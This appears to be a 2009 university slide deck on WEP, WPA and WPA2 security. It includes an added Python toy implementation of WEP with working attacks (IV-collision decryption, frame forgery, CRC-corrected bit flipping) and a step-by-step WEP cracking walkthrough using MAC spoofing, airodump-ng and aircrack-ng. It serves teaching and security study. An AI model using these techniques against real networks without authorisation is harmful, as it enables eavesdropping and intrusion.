SSI Commons
Wireless Protocols: WEP and WPA2
Bertil Maria Pires Marques
E-mail: pro09020@fe.up.pt
Dec 2009
WEP - Wired Equivalent Privacy
WEP is a security protocol, specified in the original IEEE 802.11 (Wi-Fi) standard, that is designed to protect traffic on a wireless local area network (WLAN).
Two types of authentication were introduced with the original 802.11 standard: open system and shared key authentication. (Shared key authentication is in fact the weaker of the two: the challenge and its encrypted response give an eavesdropper a plaintext/ciphertext pair, and therefore key stream.)
Wireless networks broadcast messages over radio and are thus more susceptible to eavesdropping than wired networks.
When introduced in 1997, WEP was intended to provide confidentiality comparable to that of a traditional wired network.
WEP - Wired Equivalent Privacy
The primary function of WEP is to protect wireless communication from eavesdropping.
A secondary function of WEP is to prevent unauthorized access to a wireless network. This function is not an explicit goal in the 802.11 standard, but it is frequently considered to be a feature of WEP.
WEP relies on a secret key that is shared between a mobile station (e.g. a laptop with a wireless Ethernet card) and an access point (i.e. a base station), or between two mobile stations.
WEP - Wired Equivalent Privacy
The secret key is used to encrypt packets before they are transmitted, and an integrity check is used to ensure that packets are not modified in transit. The standard does not discuss how the shared key is established.
WEP uses the stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity. For each packet a 24-bit initialization vector (IV) is prepended to the shared key to form the RC4 key; the IV itself is sent in the clear with the packet.
[Figure: Basic WEP encryption - RC4 key stream XORed with plaintext]
WEP - Wired Equivalent Privacy
Problems!!
WEP uses the RC4 encryption algorithm, which is a stream cipher. A stream cipher operates by expanding a short key into an (effectively) infinite pseudo-random key stream. The sender XORs the key stream with the plaintext to produce ciphertext. The receiver has a copy of the same key and uses it to generate the identical key stream; XORing the key stream with the ciphertext yields the original plaintext.
This mode of operation makes stream ciphers vulnerable to several attacks as soon as a key stream is reused: XORing two ciphertexts produced with the same key stream cancels the key stream and leaves the XOR of the two plaintexts. Because CRC-32 is linear, an attacker can also flip bits in the ciphertext and correct the checksum without knowing the key.
WEP - Wired Equivalent Privacy
Identified attacks
Passive attack to decrypt traffic: a passive eavesdropper intercepts all wireless traffic and waits until an IV collision occurs. Two packets encrypted with the same IV (and therefore the same key stream) reveal the XOR of their plaintexts; with only 2^24 possible IVs, repeats are inevitable.
Active attack to inject traffic: an attacker who knows the exact plaintext of one encrypted message can recover the key stream for that IV and use it to construct correctly encrypted packets of his own.
Active attack from both ends: the attacker guesses not the contents but the headers of a packet, flips bits to redirect it (for example to a host under his control) and relies on the linearity of CRC-32 to keep the integrity check valid.
Table-based attack: the small space of possible initialization vectors allows an attacker to build a decryption table (one key stream per IV) and then decrypt every packet immediately.
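The WEP construction from the previous slides and the attacks listed above, as an added Python example (illustrative code written for this page, not from the original slides or from the aircrack-ng project). RC4 and the CRC-32 ICV are implemented as the standard describes them; the key, IV and packet contents are constructed sample data, and the 802.11 header and the key-ID byte are left out. None of the attack functions ever receives the key.

```python
"""Toy WEP (RC4 + CRC-32 ICV) and the attacks that follow from key stream reuse
and a linear checksum. KEY, IV and payloads are constructed sample data;
the 802.11 header and the key-ID byte are omitted."""
import zlib

KEY = b"SSI-WEP-2009!"   # 13 bytes = 104-bit secret; with the 24-bit IV: "128-bit WEP"
IV = b"\x01\x02\x03"     # 24-bit IV, sent in the clear with every frame


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4: key scheduling, then `length` bytes of pseudo-random key stream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian on the wire."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Receiver: rebuild the key stream from IV || key, strip and verify the ICV."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    plaintext, tag = body[:-4], body[-4:]
    if tag != icv(plaintext):
        raise ValueError("ICV mismatch: frame rejected")
    return plaintext


def accepted(key: bytes, frame: bytes) -> bool:
    try:
        wep_decrypt(key, frame)
        return True
    except ValueError:
        return False


# --- attacks: none of these functions ever sees KEY ---

def iv_collision_recover(frame_a: bytes, frame_b: bytes, known_a: bytes) -> bytes:
    """Passive: same IV => same key stream, so C_a XOR C_b = P_a XOR P_b."""
    assert frame_a[:3] == frame_b[:3], "only works when the IV repeats"
    n = len(known_a)
    return xor(xor(frame_a[3:3 + n], frame_b[3:3 + n]), known_a)


def keystream_from_known_plaintext(frame: bytes, plaintext: bytes) -> bytes:
    """Known plaintext (plus its computable ICV) reveals the key stream for this IV."""
    return xor(frame[3:], plaintext + icv(plaintext))


def forge_frame(iv: bytes, keystream: bytes, new_plaintext: bytes) -> bytes:
    """Inject: any message up to the key stream length gets a valid ICV, no key needed."""
    body = new_plaintext + icv(new_plaintext)
    assert len(body) <= len(keystream)
    return iv + xor(body, keystream)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """CRC-32 is affine: CRC(P ^ D) = CRC(P) ^ CRC(D) ^ CRC(0..0), so the ICV can
    be corrected for any XOR difference D without knowing P or the key."""
    n = len(frame) - 3 - 4                      # plaintext length
    d = delta.ljust(n, b"\x00")
    delta_icv = xor(icv(d), icv(bytes(n)))
    return frame[:3] + xor(frame[3:], d + delta_icv)


def demo() -> dict:
    """Runs the attacks on traffic encrypted under KEY, which they never receive."""
    p1 = b"GET / HTTP/1.0\r\n"
    p2 = b"Hello wireless!!"                    # same length as p1, IV reused
    f1, f2 = wep_encrypt(KEY, IV, p1), wep_encrypt(KEY, IV, p2)
    ks = keystream_from_known_plaintext(f1, p1)
    d = xor(b"GET", b"PUT")
    naive = f1[:3] + xor(f1[3:], d.ljust(len(f1) - 3, b"\x00"))   # no ICV fix
    return {
        "p2_recovered": iv_collision_recover(f1, f2, p1) == p2,
        "forged_accepted": accepted(KEY, forge_frame(IV, ks, b"ATTACKER DATA")),
        "naive_flip_rejected": not accepted(KEY, naive),
        "flipped_plaintext": wep_decrypt(KEY, flip_bits(f1, d)),
    }


if __name__ == "__main__":
    print(demo())
```

Running the file prints the dictionary returned by demo(): the second plaintext is recovered from the IV collision, the forged frame and the CRC-corrected bit flip both pass the receiver's ICV check, and only the naive flip (without the CRC correction) is rejected. This is exactly why TKIP replaced the CRC with a keyed message integrity check and CCMP with a proper authentication tag.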
WPA - WiFi Protected Access
Before WPA was in use, some companies tried to secure their WLANs by filtering MAC addresses and not broadcasting SSIDs. (Neither is a real protection: the SSID and the permitted MAC addresses both travel in the clear and can be sniffed and spoofed.)
Following the weaknesses of WEP-based security, there was a period of interim security measures. Vendors such as Cisco, wanting to meet the demand for better security, developed their own systems while simultaneously helping to evolve the 802.11i standard.
On the way to 802.11i, the TKIP (Temporal Key Integrity Protocol) encryption method was created, a WPA feature used to ensure integrity in wireless data transmission and linked to the Wi-Fi Protected Access (WPA) security method.
WPA - WiFi Protected Access
TKIP is the encryption method certified as WPA. It provides support for legacy WLAN equipment by addressing the original flaws associated with the 802.11 WEP encryption method.
It makes use of the same underlying encryption algorithm as WEP (RC4), so it can run on existing hardware, but it derives a fresh per-packet key from a temporal key, the transmitter address and a packet sequence counter instead of concatenating a 24-bit IV with a static key.
TKIP has two primary functions:
It encrypts the Layer 2 payload.
It carries out a message integrity check (MIC) on the encrypted packet. This helps ensure against a message being tampered with.
WPA2 - WiFi Protected Access
The standard that should be followed in most enterprise networks is IEEE 802.11i; WPA2 is the Wi-Fi Alliance certification of that standard.
In networks that have stricter security requirements, an additional authentication or login is required to grant clients access. This login process is managed by the Extensible Authentication Protocol (EAP). EAP is a framework for authenticating network access.
IEEE developed the 802.11i standard for WLAN authentication and authorization to use IEEE 802.1X, which carries EAP between the client (supplicant) and the access point (authenticator), typically backed by a RADIUS server.
WPA2 - WiFi Protected Access
Two enterprise-level encryption mechanisms specified by 802.11i are certified as WPA and WPA2 by the Wi-Fi Alliance: Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES), used in CCMP mode.
The AES encryption of WPA2 is the preferred method, because it brings WLAN encryption into alignment with broader IT industry standards and best practices (AES is the NIST standard block cipher) and with IEEE 802.11i itself.
AES-CCMP has the same functions as TKIP (confidentiality and integrity), but it also authenticates additional data taken from the MAC header, which allows destination hosts to recognize if the non-encrypted header bits have been tampered with. It also adds a packet (sequence) number to the encrypted data header, so replayed frames are rejected.
[Figure: Wireless Protocol Overview]
WEP Protocol Cracking
Search for the desired software (the aircrack-ng suite; airodump-ng and aircrack-ng are used below).
Use a WEP key with 128 bits on the test access point.
Turn off the wireless interface so that the software can take care of it:
ifconfig wlan0 down
Afterwards we assign a spoofed MAC address, so the capture is not tied to the card's real hardware address:
ifconfig wlan0 hw ether 00:00:00:00:23:24
WEP Protocol Cracking
Check the existing networks around (airodump-ng requires the interface to be in monitor mode, e.g. set up with airmon-ng):
airodump-ng wlan0
WEP Protocol Cracking
We are only interested in the IV packets [-i], the only ones carrying information useful for cracking WEP, from WEP networks only [-t WEP], on channel 6 [-c6], written to files with the prefix listagem [-w listagem]:
airodump-ng wlan0 -i -t WEP -c6 -w listagem
WEP Protocol Cracking
[Figure: airodump-ng command result]
WEP Protocol Cracking
Command to begin the key recovery (airodump-ng numbers its output files, so the first capture is listagem-01.ivs):
aircrack-ng listagem-01.ivs
[Figure: end of the WEP protocol cracking run]
WEP Protocol Cracking
Some conclusions:
As a result, the encryption type and the key were revealed.
When in listen mode, several wireless cards were detected in the area [figure on page 17].
Listen time: 15 hours (stayed overnight).
There exist faster methods (for example, actively injecting traffic to generate IVs), but this one is the simplest and the least intrusive.
It is easy to find WEP wireless networks.
Curiosities found
When researching on the Internet, I found out about these topics:
Brazilian books published
Redes, Guia Prático
Author: Carlos E. Morimoto
Pages: 560
Format: 23 x 16 cm
Publisher: GDH Presse Sul Editores
ISBN: 978-85-99593-09-7
Released: April 2008
Throughout the book, you. Use of security utilities to capture network traffic, detect breaches and break the encryption systems of wireless networks.
Curiosities found
American magazine about hacking
Wireless Protocols WEP/WPA/WPA2
Thank you. Any questions?